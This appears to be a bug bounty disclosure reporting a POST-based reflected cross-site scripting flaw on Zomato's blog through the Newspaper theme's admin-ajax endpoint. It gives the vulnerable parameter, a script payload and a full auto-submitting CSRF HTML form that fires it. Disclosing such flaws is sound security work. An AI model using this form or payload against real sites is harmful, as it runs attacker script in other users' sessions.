##Issue details: POST based XSS ##Vulnerable URL: https://www.zomato.com/blog/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.2 ##Vulnerable Parameter: loopState[moduleId] ##Payload: <svg><script>prompt(document.domain)</script> ##Steps to reproduce: * As this is a post based you need to create a html csrf to trigger xss. * HTML code is below.. <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.zomato.com/blog/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.2" method="POST"> <input type="hidden" name="action" value="td_ajax_loop" /> <input type="hidden" name="loopState[sidebarPosition]" value="" /> <input type="hidden" name="loopState[moduleId]" value="<svg><script>prompt&#40;document.domain)</script>" /> <input type="hidden" name="loopState[currentPage]" value="2" /> <input type="hidden" name="loopState[max_num_pages]" value="4" /> <input type="hidden" name="loopState[atts][category_id]" value="479" /> <input type="hidden" name="loopState[atts][offset]" value="2" /> <input type="hidden" name="loopState[ajax_pagination_infinite_stop]" value="3" /> <input type="hidden" name="loopState[server_reply_html_data]" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> * Save this as a .html file. * Open that html file, it will trigger xss. ##POC: Screenshot and necessary files are enclosed in attachment. ## Impact Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

[Zomato's Blog] POST based XSS on https://www.zomato.com/blog/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.2

Vulnerability Details

Actions

Report Stats

Share this report